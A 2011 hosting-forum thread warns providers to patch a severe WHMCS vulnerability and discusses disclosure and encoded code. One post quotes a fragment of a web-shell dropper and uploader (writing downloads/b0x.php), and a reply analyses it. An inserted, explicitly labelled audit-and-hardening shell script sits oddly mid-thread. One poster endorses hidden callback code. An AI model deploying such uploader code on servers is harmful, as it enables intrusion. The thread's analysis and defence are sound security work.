Providers, please update your WHMCS - severe security risk.

cripperz Member
edited December 2011 in General

Hi guys,

WHMCS got hit again. It caused me to be unable to recover my admin password, and my password was changed unexpectedly.

Please refer to WHMCS forum - http://forum.whmcs.com/showthread.php?p=206522

Do update your WHMCS quickly, as this is a serious threat.

Comments

  • Thank you, I've just updated my test WHMCS =)

    €5 Enterprise VPS from Evolution Host
    SellSSL.com - Comodo PositiveSSL from $7 per year!

  • rm_ Member
    edited December 2011

    Heh, turns out sometimes it's beneficial to use providers with their own custom control panel. :)

  • @rm_ said: Heh, turns out sometimes it's beneficial to use providers with their own custom control panel. :)

    What did you mean, mate? I think WHMCS is a billing system, not a control panel?


  • At one time, I created a huge hosting control panel using CakePHP Framework, but I replaced it with WHMCS because it was AWESOME :)

  • I don't trust WHMCS or any other software that hides the code. Could have anything hidden in there. Fortunately though I have some software that removes ionCube.

  • Infinity Member, Provider

    True, but can't you decode it? The people that null the scripts must be able to do so.

    Cablestreet - London based ISP - Managed Solutions, Carrier Services, Colocation, Dedicated Servers, VMs, and more..

  • @DanielM said: Fortunately though I have some software that removes ionCube

    Would you please share it? :P


  • Thank you for pointing this out as it seems our hosting/license provider failed to mention it :)

  • Rens Member
    edited December 2011

    Every WHMCS client should have received a mailing about it. This issue seems to be known for a while, there were already people exploiting this in October. Worries me.

  • Yep, every direct WHMCS client does; it's down to our provider who issues our WHMCS license (MDD Hosting) to tell us, which they have not... still.

  • @VMPort said: our hosting/license provider failed to mention it

    Subscribe to the WHMCS twitter feed.

    Hostigation High Resource Hosting - SolusVM KVM VPS / Proxmox OpenVZ VPS- Low Cost Comodo SSL Certificates
  • @miTgib

    You get my point though, right? I shouldn't have to. If a host is providing the license/software they should be informing customers of potential security threats.

    Or am I expecting too much :P

  • They should, but it's your responsibility to keep on top of things too. Relying on someone else is adding one unnecessary point of failure to things.

  • Sure it is, that's why I have done it myself :P I also popped a ticket into MDD telling them I think it would be a good idea to let clients know. 'Cos I'm nice :)

  • @Asim said: but I replaced it with WHMCS because it WAS awesome :)

    Fixed :)

    Actually we don't use whmcs so I wouldn't know.

    @VMPort said: You get my point though, right? I shouldn't have to. If a host is providing the license/software they should be informing customers of potential security threats.

    Or am I expecting too much :P

    Nope. You just explained my entire line of work. :)

    I do wonder about the October bit up there. I know with some of the scripts that we use, once a problem is made public, sometimes someone will pop out of the woodwork and announce "Wait, I let you know about that months ago!" and point to a ticket or forum posting or something else.

    That's what concerns me. Seen it with Gallery, WordPress, Firefox, Windows, etc....

  • Ash_Hawkridge Member
    edited December 2011

    Just for reading's sake... Their response:

    We are aware, and were going to announce it, but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney
    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

  • @drmike said: Actually we don't use whmcs

    Please don't say you use Platypus still

  • Abacus

  • @VMPort said: Just for reading's sake... Their response:

    We are aware, and were going to announce it, but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney

    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

    From their twitter
    MDDHosting Forums: [Critical] WHMCS Security Update Affecting All Versions http://bit.ly/sycoEx

    I know, I'm Dale Maily.

  • @DanielM
    That's basically like running nulled software. You don't trust a company that produces software that many million-dollar companies use on a day-to-day basis.

    Your post is just stupid.

    AboveClouds • UK Company • UK Datacentre • UK Customer Support

    High Performance Pure SSD Cloud Hosting with a personal touch

  • @EaseVPS said: That's basically like running nulled software. You don't trust a company that produces software that many million-dollar companies use on a day-to-day basis.

    Your post is just stupid.

    Just like Apple tracking their users with secret software, and billions of users...


  • @giang
    That's understandable if they do; they reserve the right to keep their software out of the eyes of the world. If I had spent billions of dollars developing an operating system and a range of mini portable devices, I would not want my software to be very easy to decode.

    Every company that develops software should have some callback lines in the code.


  • Francisco Top Provider

    That's not from this bug, but rather one related to templates/etc back in October.

    Francisco

    BuyVM - Free DirectAdmin, Softaculous, & Blesta! / Anycast Support! / Windows 2008, 2012, & 2016! / Unmetered Bandwidth!
    BuyShared - Shared & Reseller Hosting / cPanel + Softaculous + CloudLinux / Pure SSD! / Free Dedicated IP Address
  • It seems somewhat harmless but I don't see what it's trying to do:

    $fo = fopen("downloads/b0x.php","w");
    fwrite($fo,$code);
    echo '';
    if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo 'Upload SUKSES !!!';
        } else {
            echo 'Upload GAGAL !!!';
        }
    }
    ?>

    I'm guessing the form was to upload config files to somewhere listed in downloads/b0x.php?

  • Francisco Top Provider

    The code would run on the server side, so since /downloads/ is normally 777, the b0x script, likely a phpshell, would dump in there.

    Francisco

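As an added example (not code from the thread, from WHMCS or from any poster), a POSIX shell audit for the condition Francisco describes: a world-writable downloads/ directory that a dropped PHP file could execute from. The install path, directory name and file names are assumptions; the hardening step writes an Apache 2.2-style .htaccess so PHP is no longer served from that directory and removes world-write.

```shell
#!/bin/sh
# Added example, not code from the thread or from WHMCS: audit a WHMCS install
# for a world-writable downloads/ directory with PHP files dropped into it,
# then harden it. Install root, directory name and file names are assumptions.

# True if the directory's mode grants write to "others" (e.g. 777).
dir_world_writable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1" 2>/dev/null)
    mode=${mode:-0}
    others=${mode#"${mode%?}"}       # last octal digit = "others"; bit 2 = write
    [ $(( others & 2 )) -ne 0 ]
}

# List PHP-looking files under an upload directory, one per line, sorted so a
# caller can diff the result against the expected (normally empty) list.
find_rogue_php() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php[0-9]' \) | sort
}

# Stop Apache from serving or executing PHP out of the directory (2.2-style
# directives, matching the era of the thread) and drop world-write.
harden_upload_dir() {
    cat > "$1/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|php[0-9])$">
    Order allow,deny
    Deny from all
</FilesMatch>
EOF
    chmod o-w "$1"
}

# Return non-zero on any finding so this can run from cron and alert someone.
audit_whmcs_downloads() {
    d="$1/downloads"
    rc=0
    if dir_world_writable "$d"; then
        echo "WARN: $d is world-writable"; rc=1
    fi
    rogue=$(find_rogue_php "$d")
    if [ -n "$rogue" ]; then
        echo "WARN: PHP files present in $d:"; echo "$rogue"; rc=1
    fi
    return $rc
}

# Usage: audit_whmcs_downloads /var/www/whmcs   (assumed install path)
```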
  • Francisco Top Provider

    @DotVPS said: How do I fix it? It's WHMCS 5?

    I'm guessing WHMCS 5 should have had it included, but I could be wrong.

    Worth logging a ticket with Matt and seeing what's up. The latest exploit just allows dumping of file contents. If you're on shared hosting this could be a serious problem, but I'd hope you have your billing on a VPS of sorts?

    Francisco

  • Francisco Top Provider

    You should get a 256MB KVM from us if anything. If you use lighttpd instead of apache you should have no issues keeping up with even huge rushes.

    Francisco

  • Infinity Member, Provider
    edited December 2011

    AFAIK. Stock is coming next year, so about a month or maybe more :P.


  • Francisco Top Provider

    @Infinity said: AFAIK. Stock is coming next year, so about a month or maybe more :P.

    We'll have some in a week or so depending on how the .32 trials finish off. We just pushed pony7.2 to 99 so we'll see how it goes.

    The kernels have been good without any real issues even under serious load.

    Francisco
